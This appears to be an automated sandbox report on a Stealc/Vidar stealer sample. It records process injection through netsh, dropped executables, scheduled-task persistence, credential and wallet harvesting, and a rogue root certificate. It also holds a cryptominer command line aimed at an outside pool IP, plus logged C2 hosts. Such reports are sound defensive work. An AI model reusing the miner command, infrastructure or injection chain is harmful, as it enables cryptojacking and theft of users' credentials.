Malware Analysis Report

2024-09-09 18:07

Sample ID 240618-r6fwdasdrr
Target 02cdfef8bcb577fb36ca108e6884b0ab7408d7f3ccacbedcaa5686fa636f138e.zip
SHA256 02cdfef8bcb577fb36ca108e6884b0ab7408d7f3ccacbedcaa5686fa636f138e
Tags
stealc vidar discovery persistence privilege_escalation spyware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

02cdfef8bcb577fb36ca108e6884b0ab7408d7f3ccacbedcaa5686fa636f138e

Threat Level: Known bad

The file 02cdfef8bcb577fb36ca108e6884b0ab7408d7f3ccacbedcaa5686fa636f138e.zip was found to be: Known bad.

Malicious Activity Summary

stealc vidar discovery persistence privilege_escalation spyware stealer

Stealc

Detect Vidar Stealer

Vidar

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Reads user/profile data of local email clients

Accesses cryptocurrency files/wallets, possible credential harvesting

Downloads MZ/PE file

Checks computer location settings

Suspicious use of SetThreadContext

Checks installed software on the system

Drops file in Windows directory

Executes dropped EXE

Loads dropped DLL

Program crash

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Checks processor information in registry

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-18 14:48

Signatures

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

124s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 1216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1216 -ip 1216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4132,i,3144109701624127473,12586215149656995128,262144 --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
BE 88.221.83.248:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 248.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 3.166.122.92.in-addr.arpa udp
NL 52.111.243.29:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/1216-0-0x0000000050310000-0x0000000050349000-memory.dmp

memory/1216-1-0x0000000050000000-0x0000000050116000-memory.dmp

memory/1216-2-0x0000000050120000-0x000000005030D000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

109s

Max time network

148s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-processthreads-l1-1-1.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-processthreads-l1-1-1.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 88.221.83.208:443 www.bing.com tcp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 208.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

99s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-synch-l1-2-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-synch-l1-2-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1876 wrote to memory of 2872 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1876 wrote to memory of 2872 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1876 wrote to memory of 2872 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

Network

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240221-en

Max time kernel

118s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240508-en

Max time kernel

117s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 220

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20231129-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

124s

Max time network

128s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3772 wrote to memory of 3692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3772 wrote to memory of 3692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3772 wrote to memory of 3692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4168,i,11069752405888604640,8928124405695604965,262144 --variations-seed-version --mojo-platform-channel-handle=4272 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 105.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:51

Platform

win10v2004-20240226-en

Max time kernel

157s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"

Signatures

Detect Vidar Stealer

stealer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\DHDAKFCGIJ.exe N/A
N/A N/A C:\ProgramData\AFBAKKFCBF.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation

Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Modifies system certificate store

evasion spyware trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [DER certificate blob omitted; the hex encodes the public Comodo CA Limited "AAA Certificate Services" root, whose SHA1 thumbprint matches the key name] C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\ProgramData\DHDAKFCGIJ.exe N/A
N/A N/A C:\ProgramData\AFBAKKFCBF.exe N/A
N/A N/A C:\ProgramData\DHDAKFCGIJ.exe N/A
N/A N/A C:\ProgramData\DHDAKFCGIJ.exe N/A
N/A N/A C:\ProgramData\AFBAKKFCBF.exe N/A
N/A N/A C:\ProgramData\AFBAKKFCBF.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2144 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2144 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2144 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2144 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 4292 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DHDAKFCGIJ.exe
PID 4292 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DHDAKFCGIJ.exe
PID 4292 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DHDAKFCGIJ.exe
PID 4292 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AFBAKKFCBF.exe
PID 4292 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AFBAKKFCBF.exe
PID 4292 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AFBAKKFCBF.exe
PID 4704 wrote to memory of 3636 N/A C:\ProgramData\DHDAKFCGIJ.exe C:\Windows\SysWOW64\ftp.exe
PID 4704 wrote to memory of 3636 N/A C:\ProgramData\DHDAKFCGIJ.exe C:\Windows\SysWOW64\ftp.exe
PID 4704 wrote to memory of 3636 N/A C:\ProgramData\DHDAKFCGIJ.exe C:\Windows\SysWOW64\ftp.exe
PID 1280 wrote to memory of 4112 N/A C:\ProgramData\AFBAKKFCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 1280 wrote to memory of 4112 N/A C:\ProgramData\AFBAKKFCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 1280 wrote to memory of 4112 N/A C:\ProgramData\AFBAKKFCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4704 wrote to memory of 3636 N/A C:\ProgramData\DHDAKFCGIJ.exe C:\Windows\SysWOW64\ftp.exe
PID 1280 wrote to memory of 4112 N/A C:\ProgramData\AFBAKKFCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4112 wrote to memory of 4500 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4112 wrote to memory of 4500 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3636 wrote to memory of 3720 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3636 wrote to memory of 3720 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3636 wrote to memory of 3720 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4112 wrote to memory of 4500 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4112 wrote to memory of 4500 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3636 wrote to memory of 3720 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4248 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2916 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:3

C:\ProgramData\DHDAKFCGIJ.exe

"C:\ProgramData\DHDAKFCGIJ.exe"

C:\ProgramData\AFBAKKFCBF.exe

"C:\ProgramData\AFBAKKFCBF.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 poocoin.online udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 18.53.55.162.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 104.21.16.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 123.16.21.104.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.196.193:443 i.imgur.com tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 udp
DE 162.55.53.18:9000 162.55.53.18 tcp
FI 135.181.22.88:80 135.181.22.88 tcp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 88.22.181.135.in-addr.arpa udp
FI 65.109.127.181:3333 tcp

Files

memory/2144-0-0x00000000744E0000-0x000000007465B000-memory.dmp
